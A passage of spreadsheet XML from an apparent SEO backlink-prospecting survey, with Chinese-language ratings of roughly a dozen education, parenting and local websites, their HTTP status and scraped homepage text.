        <x:v>低</x:v>
      </x:c>
      <x:c r="P407" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q407" s="21" t="str">
        <x:v>Affordable and convenient online professional development training available in all 50 states. AIR Training Solutions - Online Professional Development Skip to main content Toggle menu Call us at 888.994.2247 Compare Search Gift Certificates Sign in or Register Cart Search Search Buy a Course All Courses for Purchase Ohio General Courses Child Abuse and Communicable Disease Options First Aid and CPR Options Onboarding Packages Bulk Purchasing Options Age Groups Infants Toddlers Preschoolers Schoolage Target Audiences Classroom Staff/Teacher Family Childcare Program Administrator Staff Working with Special Needs States Alabama Alaska Arizona Arkansas California Colorado Connecticut Delaware Florida Georgia Hawaii Idaho Illinois Indiana Iowa Kansas Kentucky Louisiana Maine Maryland Mass</x:v>
      </x:c>
      <x:c r="R407" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S407" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T407" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://airchildcare.com</x:v>
      </x:c>
    </x:row>
    <x:row r="408">
      <x:c r="A408" s="18" t="str">
        <x:v>407</x:v>
      </x:c>
      <x:c r="B408" s="19" t="str">
        <x:v>localanchor.com</x:v>
      </x:c>
      <x:c r="C408" s="19" t="str">
        <x:v>https://localanchor.com</x:v>
      </x:c>
      <x:c r="D408" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E408" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F408" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G408" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H408" s="19" t="str">
        <x:v>https://localanchor.com/</x:v>
      </x:c>
      <x:c r="I408" s="19" t="str">
        <x:v>Things to Do in the South Bay of Los Angeles | Events, Restaurants &amp; Local Guides | Local Anchor</x:v>
      </x:c>
      <x:c r="J408" s="19" t="str">
        <x:v>付费本地目录</x:v>
      </x:c>
      <x:c r="K408" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L408" s="19" t="str">
        <x:v>付费 listing</x:v>
      </x:c>
      <x:c r="M408" s="19" t="str">
        <x:v>https://localanchor.com/submit-new-listing</x:v>
      </x:c>
      <x:c r="N408" s="19" t="str">
        <x:v>付费/不优先</x:v>
      </x:c>
      <x:c r="O408" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P408" s="21" t="str">
        <x:v>提交页面显示标准 listing 为年费，且主要是本地企业目录。</x:v>
      </x:c>
      <x:c r="Q408" s="21" t="str">
        <x:v>Your South Bay LA guide since 2017. Events, restaurants, things to do, and local news for Manhattan Beach, Hermosa Beach, Redondo Beach, Torrance &amp; more. Things to Do in the South Bay of Los Angeles | Events, Restaurants &amp; Local Guides | Local Anchor Skip to content Calendar | Add Event | Subscribe Magazine South Bay Summer Camp Guide 2026 Magazine Articles Past Issues Request Copy Guides Rain Day Guide Birthday Parties Summer 4th of July Fall Thanksgiving Winter Holidays New Years Halloween Valentine’s Day Dine Restaurant Guides South Bay Restaurant Week Things to Do Explore by City Places to Go Date Night Giving Back Events Calendar Featured Local Events Monthly Events Guide South Bay Events Volunteer Events Local Anchor Events Family Fun Days Restaurant Week South Bay Rocks Holiday Helpers Camp Fair Stories Community News Camp Spotlight Co</x:v>
      </x:c>
      <x:c r="R408" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S408" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T408" s="21" t="str">
        <x:v>跳过免费外链批次。 | 请求: https://localanchor.com</x:v>
      </x:c>
    </x:row>
    <x:row r="409">
      <x:c r="A409" s="18" t="str">
        <x:v>408</x:v>
      </x:c>
      <x:c r="B409" s="19" t="str">
        <x:v>thistinybluehouse.com</x:v>
      </x:c>
      <x:c r="C409" s="19" t="str">
        <x:v>https://thistinybluehouse.com</x:v>
      </x:c>
      <x:c r="D409" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E409" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F409" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G409" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H409" s="19" t="str">
        <x:v>https://www.thistinybluehouse.com/</x:v>
      </x:c>
      <x:c r="I409" s="19" t="str">
        <x:v>Security Verification</x:v>
      </x:c>
      <x:c r="J409" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K409" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L409" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M409" s="19" t="str">
        <x:v>https://www.thistinybluehouse.com/</x:v>
      </x:c>
      <x:c r="N409" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O409" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P409" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q409"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a349ba3388527352 Client IP: 61.211.1.60 Open Support Ticket Please include these details when opening a support ticket so we can quickly locate the challenged request.</x:v>
      </x:c>
      <x:c r="R409" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S409" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T409" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://thistinybluehouse.com</x:v>
      </x:c>
    </x:row>
    <x:row r="410">
      <x:c r="A410" s="18" t="str">
        <x:v>409</x:v>
      </x:c>
      <x:c r="B410" s="19" t="str">
        <x:v>lovetabitha.com</x:v>
      </x:c>
      <x:c r="C410" s="19" t="str">
        <x:v>https://lovetabitha.com</x:v>
      </x:c>
      <x:c r="D410" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E410" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F410" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G410" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H410" s="19" t="str">
        <x:v>https://www.lovetabitha.com/</x:v>
      </x:c>
      <x:c r="I410" s="19" t="str">
        <x:v>Love Tabitha – Love, Tabitha</x:v>
      </x:c>
      <x:c r="J410" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K410" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L410" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M410" s="19" t="str">
        <x:v>https://www.lovetabitha.com/</x:v>
      </x:c>
      <x:c r="N410" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O410" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P410" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q410" s="21" t="str">
        <x:v>Love Tabitha – Love, Tabitha Skip to content Home Blog HOMESTEADING RECIPES SIMPLE LIVING GARDENING SEASONAL LIFESTYLE PNW → VIEW ALL Shop Shop My 🖤 Shop Amazon About About Privacy Policy Contact welcome! Growing a beautiful life—one season at a time. Hi, I’m Tabitha! Welcome to my little corner of the Pacific Northwest, where I’m building a food forest, tending gardens, raising chickens and bees, cooking from scratch, and sharing the beauty of a slower, more intentional life. READ MY STORY SEASONAL How to Budget for the Holidays Before Winter September 1, 2026 September 1, 2026 Every year Christmas somehow does the exact same thing. It arrives on December 25th. Every. Single. Year. And yet</x:v>
      </x:c>
      <x:c r="R410" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S410" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T410" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://lovetabitha.com</x:v>
      </x:c>
    </x:row>
    <x:row r="411">
      <x:c r="A411" s="18" t="str">
        <x:v>410</x:v>
      </x:c>
      <x:c r="B411" s="19" t="str">
        <x:v>sim-system.co.jp</x:v>
      </x:c>
      <x:c r="C411" s="19" t="str">
        <x:v>https://sim-system.co.jp</x:v>
      </x:c>
      <x:c r="D411" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E411" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F411" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G411" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H411" s="19" t="str">
        <x:v>https://sim-system.co.jp/</x:v>
      </x:c>
      <x:c r="I411" s="19" t="str">
        <x:v>シム・システム株式会社 | 電設資材・住設資材の総合商社</x:v>
      </x:c>
      <x:c r="J411" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K411" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L411" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M411" s="19" t="str">
        <x:v>https://sim-system.co.jp/</x:v>
      </x:c>
      <x:c r="N411" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O411" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P411" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q411" s="21" t="str">
        <x:v>電設資材・住設資材の総合商社 シム・システム株式会社 | 電設資材・住設資材の総合商社 コンテンツへスキップ ナビゲーションに移動 Home 取扱商材 会社概要 アクセス 個人情報保護方針 お問い合わせ 私たちの生活を創る、支える 5000点以上の在庫！ 東海地方最大級の在庫数 分電盤やブレーカー、電線、配管、配線器具まで、電気設備、住宅設備中心に多くの商品数を在庫保管しています。 弊社の在庫商品だけでなく、気になる商品がございましたらお取り寄せも可能でございます。お気軽にお問い合わせください。 最短即日発送！ 電設・住設中心の通販サイト 購入をご検討の方はコチラから。電気設備、住宅設備中心の通販サイト「材料マーケットのザイマ」を運営しています。※在庫商品で平日14時までに注文・決済完了で出荷いたします。土日祝のご注文は翌営業日の対応となりますのでご注意ください。 さらに詳しく お知らせ 2025/07/30 8/10(日)-11(火) / 13(水)-17(日)は夏季休暇いたします。 2025/07/09 7/18（金）は弊社の業務の都合により臨時休業致します。 2025/04/10 ゴールデンウイークの営業スケジュールのお知らせ 2025/03/01 3/20（木）決算棚卸による休業のお知らせ お問い合わせ ご依頼及び業務内容へのご質問などお気軽にお問い合わせください 052-799-7789 電話でのお問い合わせはこちら メールでのお問い合わせ お気軽にお問い合わせください シム・システム株式会社 〒454-8174 愛知県名古屋市中川区柳森町104 TEL:052-799-7789 営業時間：8：3</x:v>
      </x:c>
      <x:c r="R411" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S411" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T411" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sim-system.co.jp</x:v>
      </x:c>
    </x:row>
    <x:row r="412">
      <x:c r="A412" s="18" t="str">
        <x:v>411</x:v>
      </x:c>
      <x:c r="B412" s="19" t="str">
        <x:v>prairierootshomeschool.com</x:v>
      </x:c>
      <x:c r="C412" s="19" t="str">
        <x:v>https://prairierootshomeschool.com</x:v>
      </x:c>
      <x:c r="D412" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E412" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F412" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G412" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H412" s="19" t="str">
        <x:v>https://prairierootshomeschool.com/</x:v>
      </x:c>
      <x:c r="I412" s="19" t="str">
        <x:v>Prairie Roots Homeschool -</x:v>
      </x:c>
      <x:c r="J412" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K412" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L412" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M412" s="19" t="str">
        <x:v>https://prairierootshomeschool.com/</x:v>
      </x:c>
      <x:c r="N412" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O412" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P412" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q412" s="21" t="str">
        <x:v>Prairie Roots Homeschool - Skip to content Main Menu Charlotte Mason Homeschool Tips Book Lists Preschool About Contact What Does the Bible Say About Homeschooling? By Prairie Roots Homeschool The Bible was written in a different time and a different culture. If you are a Christian, you still look to Scripture to know how to live your life in the will of God. The principles of the Bible are still applicable, and it is the Living Word of God, so we know that we &amp;hellip; What Does the Bible Say About Homeschooling? Read More &amp;raquo; The Pros and Cons of Homeschooling By Prairie Roots Homeschool Deciding whether or not you want to choose homeschooling for your family can be difficult. Everyone </x:v>
      </x:c>
      <x:c r="R412" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S412" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T412" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://prairierootshomeschool.com</x:v>
      </x:c>
    </x:row>
    <x:row r="413">
      <x:c r="A413" s="18" t="str">
        <x:v>412</x:v>
      </x:c>
      <x:c r="B413" s="19" t="str">
        <x:v>hobbyscool.com</x:v>
      </x:c>
      <x:c r="C413" s="19" t="str">
        <x:v>https://hobbyscool.com</x:v>
      </x:c>
      <x:c r="D413" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E413" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F413" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G413" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H413" s="19" t="str">
        <x:v>https://www.hobbyscool.com/</x:v>
      </x:c>
      <x:c r="I413" s="19" t="str">
        <x:v>HobbyScool</x:v>
      </x:c>
      <x:c r="J413" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K413" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L413" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M413" s="19" t="str">
        <x:v>https://www.hobbyscool.com/</x:v>
      </x:c>
      <x:c r="N413" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O413" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P413" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q413" s="21" t="str">
        <x:v>HobbyScool is a virtual, instructor-led creative platform that hosts curated free live events and workshops, with optional VIP upgrades for extended access and bonuses. HobbyScool 0 Skip to Content Home Get Involved Craft &amp; Create Club Become an Affiliate Apply to Speak Event Schedule Community Summit Shop Support Login to your course Open Menu Close Menu Open Menu Close Menu Home Get Involved Craft &amp; Create Club Become an Affiliate Apply to Speak Event Schedule Community Summit Shop Support Login to your course Home Folder: Get Involved Back Craft &amp; Create Club Become an Affiliate Apply to Speak Event Schedule Community Summit Shop Support Login to your course 2026 event calendar ✦ A full year of free events, made for you. Every month, HobbyScool brings makers together for free virtual workshops, summits, and seasonal retreats. Join the list and never miss</x:v>
      </x:c>
      <x:c r="R413" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S413" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T413" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://hobbyscool.com</x:v>
      </x:c>
    </x:row>
    <x:row r="414">
      <x:c r="A414" s="18" t="str">
        <x:v>413</x:v>
      </x:c>
      <x:c r="B414" s="19" t="str">
        <x:v>theinspirationedit.com</x:v>
      </x:c>
      <x:c r="C414" s="19" t="str">
        <x:v>https://theinspirationedit.com</x:v>
      </x:c>
      <x:c r="D414" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E414" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F414" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G414" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H414" s="19" t="str">
        <x:v>https://www.theinspirationedit.com/</x:v>
      </x:c>
      <x:c r="I414" s="19" t="str">
        <x:v>The Inspiration Edit | The Inspiration Edit</x:v>
      </x:c>
      <x:c r="J414" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K414" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L414" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M414" s="19" t="str">
        <x:v>https://www.theinspirationedit.com/</x:v>
      </x:c>
      <x:c r="N414" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O414" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P414" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q414" s="21" t="str">
        <x:v>Welcome to The Inspiration Edit a family and lifestyle blog packed with fantastic ideas for parenting, home style, kids crafts and family The Inspiration Edit | The Inspiration Edit The Inspiration Edit About Lifestyle Recipe Index Craft Index PR About Lifestyle Recipe Index Craft Index PR cueronet.com infomallorca.ru lennoxsoft.com plazalecea.com prideofpoland.com radicalco-op.com refugeeresourcecentre.org.uk sagarsoyaproducts.com sietarrussia.ru stroyorbita.ru pinup пин ап pin up 1win 1win казино About Lifestyle Recipe Index Craft Index PR cueronet.com infomallorca.ru lennoxsoft.com plazalecea.com prideofpoland.com radicalco-op.com refugeeresourcecentre.org.uk sagarsoyaproducts.com sietarrussia.ru stroyorbita.ru pinup пин ап pin up 1win 1win казино × Sign Up To Our Newsletter &amp;rarr; The Inspiration Edit Kids Crafts, Easy Rec</x:v>
      </x:c>
      <x:c r="R414" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S414" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T414" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://theinspirationedit.com</x:v>
      </x:c>
    </x:row>
    <x:row r="415">
      <x:c r="A415" s="18" t="str">
        <x:v>414</x:v>
      </x:c>
      <x:c r="B415" s="19" t="str">
        <x:v>totlessons.com</x:v>
      </x:c>
      <x:c r="C415" s="19" t="str">
        <x:v>https://totlessons.com</x:v>
      </x:c>
      <x:c r="D415" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E415" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F415" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G415" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H415" s="19" t="str">
        <x:v>https://totlessons.com/</x:v>
      </x:c>
      <x:c r="I415" s="19" t="str">
        <x:v>Home Page - totlessons.com</x:v>
      </x:c>
      <x:c r="J415" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K415" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L415" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M415" s="19" t="str">
        <x:v>https://totlessons.com/</x:v>
      </x:c>
      <x:c r="N415" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O415" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P415" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q415" s="21" t="str">
        <x:v>Home Page - totlessons.com Skip to content Menu Menu Letter Of The Week Curriculum Overview Letters A-Z Supplies To Get Started Alphabet Games &amp; Activities Contact About Letter Learning For Toddlers and Preschoolers Want a fun, interactive letter learning curriculum for your toddler or preschooler? Our completely free resources will get you going FAST ! Explore Letter of The Week What You'll Get The Tot Lessons Letter of The Week curriculum is perfect for preschoolers and toddlers. It's easy to follow along and beautifully designed to make it a fun and pleasant learning experience. Here are a few things you'll find in the curriculum: Custom-built printable activities for each letter Books, a</x:v>
      </x:c>
      <x:c r="R415" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S415" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T415" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://totlessons.com</x:v>
      </x:c>
    </x:row>
    <x:row r="416">
      <x:c r="A416" s="18" t="str">
        <x:v>415</x:v>
      </x:c>
      <x:c r="B416" s="19" t="str">
        <x:v>pineapplepaperco.com</x:v>
      </x:c>
      <x:c r="C416" s="19" t="str">
        <x:v>https://pineapplepaperco.com</x:v>
      </x:c>
      <x:c r="D416" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E416" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F416" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G416" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H416" s="19" t="str">
        <x:v>https://pineapplepaperco.com/</x:v>
      </x:c>
      <x:c r="I416" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J416" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K416" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L416" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M416" s="19" t="str">
        <x:v>https://pineapplepaperco.com/</x:v>
      </x:c>
      <x:c r="N416" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O416" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P416" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q416" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R416" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S416" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T416" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://pineapplepaperco.com</x:v>
      </x:c>
    </x:row>
    <x:row r="417">
      <x:c r="A417" s="18" t="str">
        <x:v>416</x:v>
      </x:c>
      <x:c r="B417" s="19" t="str">
        <x:v>teacherwebshelf.com</x:v>
      </x:c>
      <x:c r="C417" s="19" t="str">
        <x:v>https://teacherwebshelf.com</x:v>
      </x:c>
      <x:c r="D417" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E417" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F417" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G417" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H417" s="19" t="str">
        <x:v>https://teacherwebshelf.com/</x:v>
      </x:c>
      <x:c r="I417" s="19" t="str">
        <x:v>Teacher Webshelf</x:v>
      </x:c>
      <x:c r="J417" s="19" t="str">
        <x:v>老旧教育链接页</x:v>
      </x:c>
      <x:c r="K417" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L417" s="19" t="str">
        <x:v>过时 Suggest a site</x:v>
      </x:c>
      <x:c r="M417" s="19" t="str">
        <x:v>https://www.teacherwebshelf.com/tech%20in%20curric/links.html</x:v>
      </x:c>
      <x:c r="N417" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O417" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P417" s="21" t="str">
        <x:v>虽有 Suggest a site 文案，但页面内容和链接体系极其陈旧，最后更新线索接近 2000 年。</x:v>
      </x:c>
      <x:c r="Q417" s="21" t="str">
        <x:v>A teacher resource and communication system for various classroom projects. Teacher Webshelf Welcome to From the first online presence of "Classroom Animals and Pets" December 24, 1997... to the metamorphosis into my domain name "Teacher Webshelf.com" May 26, 2000... and now April 2026! This website continues to evolve! email updated and revised February 2025</x:v>
      </x:c>
      <x:c r="R417" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S417" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T417" s="21" t="str">
        <x:v>除非人工确认仍有人维护，否则跳过。 | 请求: https://teacherwebshelf.com</x:v>
      </x:c>
    </x:row>
    <x:row r="418">
      <x:c r="A418" s="18" t="str">
        <x:v>417</x:v>
      </x:c>
      <x:c r="B418" s="19" t="str">
        <x:v>kaydeerunkel.com</x:v>
      </x:c>
      <x:c r="C418" s="19" t="str">
        <x:v>https://kaydeerunkel.com</x:v>
      </x:c>
      <x:c r="D418" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E418" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F418" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G418" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H418" s="19" t="str">
        <x:v>https://www.kaydeerunkel.com/</x:v>
      </x:c>
      <x:c r="I418" s="19" t="str">
        <x:v>KayDee Runkel art+design</x:v>
      </x:c>
      <x:c r="J418" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K418" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L418" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M418" s="19" t="str">
        <x:v>https://www.kaydeerunkel.com/</x:v>
      </x:c>
      <x:c r="N418" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O418" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P418" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q418" s="21" t="str">
        <x:v>Texas artist and designer. Custom paintings. KayDee Runkel art+design Cart 0 Sign In My Account Shop Commissions Portfolio About Blog Contact StudioFour10 Back Prints Neutrals Collection Originals Texas Ornaments Sign In My Account Cart 0 Shop Prints Neutrals Collection Originals Texas Ornaments Commissions Portfolio About Blog Contact StudioFour10 Join The collector's list Sign up to get access to new releases, special offers, and more! Email Address Sign Up Don’t worry, we won’t spam you! Thank you! FAQ Terms &amp; Conditions Contact &amp;copy; 2021 KayDee Runkel art + design</x:v>
      </x:c>
      <x:c r="R418" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S418" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T418" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://kaydeerunkel.com</x:v>
      </x:c>
    </x:row>
    <x:row r="419">
      <x:c r="A419" s="18" t="str">
        <x:v>418</x:v>
      </x:c>
      <x:c r="B419" s="19" t="str">
        <x:v>lorenaylennox.com</x:v>
      </x:c>
      <x:c r="C419" s="19" t="str">
        <x:v>https://lorenaylennox.com</x:v>
      </x:c>
      <x:c r="D419" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E419" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F419" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G419" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H419" s="19" t="str">
        <x:v>https://lorenaylennox.com/</x:v>
      </x:c>
      <x:c r="I419" s="19" t="str">
        <x:v>Home - Bilingual Beginnings</x:v>
      </x:c>
      <x:c r="J419" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K419" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L419" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M419" s="19" t="str">
        <x:v>https://lorenaylennox.com/</x:v>
      </x:c>
      <x:c r="N419" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O419" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P419" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q419" s="21" t="str">
